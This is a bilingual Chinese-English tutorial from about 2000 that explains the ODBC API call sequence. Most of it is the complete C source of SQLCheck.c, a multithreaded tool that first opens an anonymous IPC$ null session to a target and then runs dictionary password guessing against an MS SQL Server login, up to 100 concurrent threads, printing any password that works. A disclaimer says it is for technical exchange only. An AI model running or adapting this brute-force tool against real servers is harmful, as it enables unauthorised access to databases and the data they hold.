eyas
ODBC是开放数据互连(Open Database Connectivity)的简称,它是一个用于远程访问数据库(主要是关系型数据库)的统一界面标准。ODBC在现实运用中是一个数据库的访问库,它提供了一组ODBC API函数可以提供给编程者使用。对于程序员来说,ODBC API函数集实际上等于一个动态连接库(DLL)集,可以在应用程序中直接使用它们。
ODBC is short for Open Database Connectivity, a uniform interface standard for accessing databases (mainly relational ones) remotely. In practice ODBC is a database access library that exposes a set of ODBC API functions to the programmer. From the programmer's point of view, the ODBC API is effectively a set of dynamic-link libraries (DLLs) that an application can call directly.
一个应用程序直接调用ODBC API函数来进行数据库的应用工作,工作过程一般比较复杂。其中一种办法大概是以下几步: An application that calls the ODBC API directly to do its database work goes through a fairly involved sequence. One typical approach is roughly the following steps:
<1>启动ODBC数据库应用程序。 <1> Start the ODBC database application.
<2>与服务器建立IPC SESSION。 <2> Establish an IPC session with the server.
<3>创建数据库应用的环境句柄。 <3> Allocate the ODBC environment handle for the application.
<4>创建连接句柄。 <4> Allocate a connection handle.
<5>连接数据源。 <5> Connect to the data source.
<6>创建语句句柄。 <6> Create statement handle.
<7>通过上一步创建的语句句柄来执行SQL操作。 <7> Execute SQL operations through the statement handle created in the previous step.
<8>释放语句句柄。 <8> free the statement handle.
<9>要进行多次SQL操作的话,就循环步骤6-8。 <9> To perform several SQL operations, repeat steps 6-8.
<10>断开与数据库的连接。 <10> Disconnect from the database.
<11>释放连接句柄。 <11> release the connection handle.
<12>释放环境句柄。 <12> release the environment handle.
<13>断开IPC SESSION。 <13> Disconnect IPC SESSION.
<14>程序结束。 <14> The program ends.
下面以一个实例来说明远程检测MS SQL Server账号密码的全过程。此程序只作技术交流之用,如用于不法用途,作者不负任何责任! The following example walks through the whole process of remotely testing an MS SQL Server account's password. Note that this is online guessing against a live server: every candidate is a real login attempt (one SQLDriverConnect call per dictionary entry), so each failure is visible to the server and can be audited or alerted on. This program is provided for technical exchange only; the author accepts no responsibility if it is put to illegal use.
/********************************************************** /************************************************* *********
Module Name:SQLCheck.c Module Name: SQLCheck.c
Date:2000.12.14 Date: 2000.12.14
WEB:www.patching.net WEB: www.patching.net
Notices:Copyright(c) eyas Notices: Copyright (c) eyas
**********************************************************/ ************************************************** ********/
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
#include # Include
//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////
file://定义全局变量 file: / / define global variables
char dict[20000][40],// password dictionary: one candidate per entry (at most 39 chars + NUL), filled by ReadDic()
UserName[40],// SQL Server login name under test (copied from argv[2] in main)
target[40],// target server name or address (copied from argv[1] in main)
passwd[40];// candidate that produced a successful login; meaningful only while Cracked is TRUE
int total=0;// number of entries ReadDic() stored in dict[]
BOOL Cracked=FALSE;// set to TRUE by a worker thread (SQLCheck) when SQLDriverConnect succeeds
// NOTE(review): Cracked and passwd are written by worker threads and read by main()
// with no synchronisation other than the kernel objects below; the read inside
// main's creation loop is a benign race at best.
HANDLE hSemaphore,// counting semaphore: one slot per concurrent worker, MaxThreads slots in total
hEvent;// manual-reset event; a worker sets it when it computes that no other worker is active
long MaxThreads,// maximum number of concurrent workers (argv[4]; main() enforces 1..100)
ActiveThreads;// derived by SQLCheck() from the semaphore's previous count; informational only
//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////
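/*
 * Print the command-line synopsis to stdout.
 *
 * pragname: argv[0], echoed into the Usage and Example lines.
 *
 * The placeholders in the Usage line mirror what main() actually parses:
 * argv[1] target host, argv[2] SQL login, argv[3] dictionary file,
 * argv[4] maximum number of concurrent threads (accepted range 1..100).
 */
void usage(char *pragname)
{
    printf("\nPower by eyas"
           "\nhttp://www.patching.net"
           "\n2000/12/14"
           "\n\nUsage:%s <target> <username> <dictionary> <threads 1-100>"
           "\nExample:%s 192.168.0.1 sa c:\\pwd.dic 50\n", pragname, pragname);
}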
//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////
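/*
 * Load the password dictionary file `dic` into the global dict[] table.
 *
 * One candidate per line.  The line terminator ("\n" or "\r\n") is removed
 * and every stored entry is NUL-terminated.  Empty lines are kept as an
 * empty candidate.  Loading stops at end of file or when dict[] is full.
 * `total` is reset to 0 before loading and holds the entry count afterwards.
 *
 * Returns 0 on success, 1 if the file cannot be opened (message on stdout).
 */
int ReadDic(char *dic)
{
    FILE *fp;
    char tmp[40];
    const size_t capacity = sizeof(dict) / sizeof(dict[0]);

    fp = fopen(dic, "r");
    if (fp == NULL)
    {
        printf("\nCan't open %s", dic);
        return 1;
    }

    total = 0;
    /* fgets() returning NULL covers both EOF and read errors; testing
       feof() before the read would process the final line twice. */
    while ((size_t)total < capacity && fgets(tmp, sizeof(tmp), fp) != NULL)
    {
        /* Cut at the first CR or LF rather than blindly dropping the last
           byte: a final line without a newline, or a CRLF file read by a
           libc that does not translate it, would otherwise lose or keep a
           real character of the password. */
        tmp[strcspn(tmp, "\r\n")] = '\0';
        /* A line of 39+ characters is truncated by fgets(); its remainder
           will come back as a separate candidate on the next iteration. */
        strncpy(dict[total], tmp, sizeof(dict[total]) - 1);
        dict[total][sizeof(dict[total]) - 1] = '\0';
        total++;
    }

    fclose(fp);
    return 0;
}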
//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////
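/*
 * Open an SMB "null session" (empty user name and empty password) to the
 * IPC$ share of `RemoteName`, i.e. \\<RemoteName>\ipc$.
 *
 * The UNC path is only built if it fits: `target` may carry up to 39
 * characters, so the buffer is sized for the prefix, the name and the share
 * suffix and over-long names are rejected instead of overrunning the stack.
 *
 * NOTE(review): this anonymous IPC$ connection is separate from the ODBC
 * login attempted later; it only pre-establishes the SMB transport.  Current
 * Windows versions refuse anonymous IPC$ access by default, so this step may
 * fail against hardened hosts even when the SQL login would succeed.
 *
 * Returns 0 if WNetAddConnection2() reports NO_ERROR, 1 otherwise
 * (including a NULL or over-long name).
 */
int ConnIPC(char *RemoteName)
{
    NETRESOURCE nr;
    char RN[64];
    const char prefix[] = "\\\\";
    const char share[] = "\\ipc$";

    if (RemoteName == NULL ||
        strlen(prefix) + strlen(RemoteName) + strlen(share) >= sizeof(RN))
    {
        return 1;
    }
    strcpy(RN, prefix);
    strcat(RN, RemoteName);
    strcat(RN, share);

    memset(&nr, 0, sizeof(nr));
    nr.dwType = RESOURCETYPE_DISK;
    nr.lpLocalName = NULL;          /* no drive letter: IPC$ is never mapped */
    nr.lpRemoteName = (LPTSTR)RN;
    nr.lpProvider = NULL;           /* let the system pick the provider */

    /* Empty user name and password request an anonymous (null) session. */
    if (WNetAddConnection2(&nr, "", "", CONNECT_UPDATE_PROFILE) == NO_ERROR)
        return 0;
    return 1;
}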
//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////
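/*
 * Tear down the IPC$ connection that ConnIPC() opened to `RemoteName`.
 *
 * The UNC path is rebuilt with the same length check as ConnIPC(), so a
 * name that was too long to connect is also too long to disconnect and
 * simply yields 1 instead of overrunning the buffer.
 *
 * Returns 0 if WNetCancelConnection2() reports NO_ERROR, 1 otherwise.
 */
int DelIPC(char *RemoteName)
{
    char lpName[64];
    const char prefix[] = "\\\\";
    const char share[] = "\\ipc$";

    if (RemoteName == NULL ||
        strlen(prefix) + strlen(RemoteName) + strlen(share) >= sizeof(lpName))
    {
        return 1;
    }
    strcpy(lpName, prefix);
    strcat(lpName, RemoteName);
    strcat(lpName, share);

    /* fForce = TRUE: drop the session even if pipes/files are still open on it */
    if (WNetCancelConnection2((LPTSTR)lpName, CONNECT_UPDATE_PROFILE, TRUE) == NO_ERROR)
        return 0;
    return 1;
}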
//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////
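/*
 * Worker thread: try one candidate password against the target SQL Server.
 *
 * pPwd: pointer to a NUL-terminated candidate (an entry of dict[]).
 *
 * Builds an ODBC connection string for the "SQL Server" driver from the
 * globals target and UserName plus the candidate, and calls
 * SQLDriverConnect().  A login that returns SQL_SUCCESS or
 * SQL_SUCCESS_WITH_INFO is recorded by copying the candidate into passwd
 * and setting Cracked = TRUE; a rejected login is the expected outcome and
 * is silent.
 *
 * On every path the worker returns its concurrency slot with
 * ReleaseSemaphore(hSemaphore) and, if the semaphore's previous count shows
 * it was the last active worker, sets hEvent for main().  ODBC setup
 * failures are reported and the thread returns 1; they no longer call
 * ExitProcess() from a worker, which killed the process and skipped this
 * bookkeeping.
 *
 * Returns 0 after a completed attempt (hit or miss), 1 if the attempt could
 * not be made.
 */
DWORD WINAPI SQLCheck(PVOID pPwd)
{
    static const char fmt[] =
        "DRIVER={SQL Server};SERVER=%s;UID=%s;PWD=%s;DATABASE=master";
    char szBuffer[1025];
    SQLCHAR ConnStr[200];
    const char *pwd = (const char *)pPwd;
    SWORD swStrLen = 0;
    SQLHANDLE henv = SQL_NULL_HANDLE;
    SQLHDBC hdbc = SQL_NULL_HANDLE;
    SQLRETURN retcode;
    long PreviousCount = 0;
    DWORD result = 1;

    /* Bounded build of the connection string.  A candidate containing ';'
       would be read by the driver manager as additional keywords, so it
       cannot be tested faithfully and is skipped rather than misparsed. */
    if (pwd == NULL || strchr(pwd, ';') != NULL ||
        strlen(fmt) + strlen(target) + strlen(UserName) + strlen(pwd) >= sizeof(ConnStr))
    {
        printf("\nSkipping candidate: connection string would be malformed or too long.\n");
        goto done;
    }
    sprintf((char *)ConnStr, fmt, target, UserName, pwd);

    if (SQLAllocHandle(SQL_HANDLE_ENV, SQL_NULL_HANDLE, &henv) != SQL_SUCCESS)
    {
        printf("\nAllocate environment handle failed.\n");
        goto done;
    }
    if (SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION, (SQLPOINTER)SQL_OV_ODBC3,
                      SQL_IS_INTEGER) != SQL_SUCCESS)
    {
        printf("\nSet the ODBC version environment attribute failed.\n");
        goto free_env;
    }
    if (SQLAllocHandle(SQL_HANDLE_DBC, henv, &hdbc) != SQL_SUCCESS)
    {
        printf("\nAllocate connection handle failed.\n");
        goto free_env;
    }

    /* No window handle is supplied, so the driver cannot prompt; the
       connection string already carries every attribute it needs. */
    retcode = SQLDriverConnect(hdbc, NULL, ConnStr, (SQLSMALLINT)strlen((char *)ConnStr),
                               (SQLCHAR *)szBuffer, sizeof(szBuffer), &swStrLen,
                               SQL_DRIVER_COMPLETE_REQUIRED);
    if (retcode == SQL_SUCCESS || retcode == SQL_SUCCESS_WITH_INFO)
    {
        /* Login accepted.  Store the password before raising the flag so a
           reader that sees Cracked also sees a complete, terminated passwd. */
        strncpy(passwd, pwd, sizeof(passwd) - 1);
        passwd[sizeof(passwd) - 1] = '\0';
        Cracked = TRUE;
        SQLDisconnect(hdbc);
    }
    result = 0;

    SQLFreeHandle(SQL_HANDLE_DBC, hdbc);
free_env:
    SQLFreeHandle(SQL_HANDLE_ENV, henv);
done:
    /* Return the slot; PreviousCount is only valid when the release succeeds.
       ActiveThreads = slots in use other than ours; zero means we were last. */
    if (ReleaseSemaphore(hSemaphore, 1, &PreviousCount))
    {
        ActiveThreads = MaxThreads - PreviousCount - 1;
        if (ActiveThreads == 0)
            SetEvent(hEvent);
    }
    return result;
}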
//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////
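/*
 * Entry point: SQLCheck <target> <username> <dictionary> <threads>
 *
 * Parses and validates the arguments, loads the dictionary, opens an IPC$
 * null session to the target, then runs one SQLCheck() worker per
 * candidate with at most MaxThreads in flight, until the list is exhausted
 * or a worker reports a hit.  Afterwards it waits for the workers to finish
 * (3-minute budget), drops the IPC$ session and prints the result and the
 * elapsed time.
 *
 * Points worth knowing about the flow:
 *  - argv[1]/argv[2] are rejected if they do not fit the 40-byte globals
 *    target/UserName, so the copies are always NUL-terminated and later
 *    string building on them stays in bounds.
 *  - the semaphore slot is taken *before* CreateThread() and given back if
 *    creation fails, so every live worker holds exactly one slot and a
 *    failed CreateThread() cannot leak one.
 *  - completion is detected by re-acquiring all MaxThreads slots instead of
 *    waiting on hEvent: a worker can set the manual-reset event "early"
 *    while main() is still between two CreateThread() calls, which would
 *    make the final wait return with workers still running.
 *  - an empty dictionary is reported instead of waiting out the timeout.
 *
 * Returns 0 on a completed run, 1 on a usage or setup error.
 */
int main(int argc, char **argv)
{
    HANDLE hThread;
    DWORD dwThreadId, dwRet = WAIT_OBJECT_0;
    DWORD deadline;
    int i, err = 0;
    long slots;
    char *end = NULL;
    clock_t start, finish;
    double duration;

    if (argc != 5)
    {
        usage(argv[0]);
        return 1;
    }

    /* Bounded copies: the globals are 40 bytes and must stay terminated. */
    if (strlen(argv[1]) >= sizeof(target) || strlen(argv[2]) >= sizeof(UserName))
    {
        printf("\nTarget and user name must be shorter than %u characters.\n",
               (unsigned)sizeof(target));
        return 1;
    }
    strcpy(target, argv[1]);
    strcpy(UserName, argv[2]);

    /* Thread count: must be a whole number in 1..100, nothing trailing. */
    MaxThreads = strtol(argv[4], &end, 10);
    if (end == argv[4] || *end != '\0' || MaxThreads > 100 || MaxThreads < 1)
    {
        usage(argv[0]);
        return 1;
    }

    if (ReadDic(argv[3]) != 0)
        return 1;
    if (total == 0)
    {
        printf("\nDictionary %s contains no entries.\n", argv[3]);
        return 1;
    }

    if (ConnIPC(argv[1]) != 0)
    {
        printf("\nCan't built IPC NULL Session!");
        return 1;
    }
    printf("\nBuilt IPC NULL Session success!\n");

    /* MaxThreads slots, all free: one is taken per running worker. */
    hSemaphore = CreateSemaphore(NULL, MaxThreads, MaxThreads, NULL);
    if (hSemaphore == NULL)
    {
        printf("\nCreateSemaphore() failed.ErrorCode:%d.", (int)GetLastError());
        DelIPC(target);
        return 1;
    }
    /* Manual-reset, initially unsignalled; still created because SQLCheck()
       sets it, even though completion is detected via the semaphore below. */
    hEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
    if (hEvent == NULL)
    {
        printf("\nCreateEvent() failed.ErrorCode:%d.", (int)GetLastError());
        CloseHandle(hSemaphore);
        DelIPC(target);
        return 1;
    }

    start = clock();

    for (i = 0; i < total && Cracked != TRUE; i++)
    {
        printf("\n[%d/%d] %s -> %s -> %s", i + 1, total, target, UserName, dict[i]);

        /* Take the slot first; the worker releases it when it is done. */
        WaitForSingleObject(hSemaphore, INFINITE);
        hThread = CreateThread(NULL, 0, SQLCheck, (PVOID)dict[i], 0, &dwThreadId);
        if (hThread == NULL)
        {
            ReleaseSemaphore(hSemaphore, 1, NULL);   /* slot never used */
            err++;
            MessageBox(NULL, "thread error", "error", MB_OK);
            if (err >= 50)
                break;
            continue;
        }
        CloseHandle(hThread);
        Sleep(10);
    }

    /* Drain: once main() holds every slot no worker can still be running.
       The 3-minute budget covers the whole drain, not each slot. */
    deadline = GetTickCount() + 180000;
    for (slots = 0; slots < MaxThreads; slots++)
    {
        DWORD now = GetTickCount();
        DWORD remaining = ((LONG)(deadline - now) > 0) ? (deadline - now) : 0;
        dwRet = WaitForSingleObject(hSemaphore, remaining);
        if (dwRet != WAIT_OBJECT_0)
            break;
    }
    switch (dwRet)
    {
    case WAIT_OBJECT_0:
        printf("\nAll thread done.");
        break;
    case WAIT_TIMEOUT:
        printf("\nWait time out.Exit.");
        break;
    case WAIT_FAILED:
        printf("\nWaitForSingleObject() failed.");
        break;
    default:
        break;
    }

    DelIPC(target);

    if (Cracked == TRUE)
        printf("\n\nSuccess!%s SQL Server User [%s] passwd is [%s].", target, UserName, passwd);

    finish = clock();
    duration = (double)(finish - start) / CLOCKS_PER_SEC;
    printf("\n\nComplete.Use %2.1f seconds.\n", duration);

    CloseHandle(hEvent);
    CloseHandle(hSemaphore);
    return 0;
}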
//////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////// //////////////////////
程序在windows2000,vc++6.0环境下编译通过。 The program was compiled successfully on Windows 2000 with VC++ 6.0.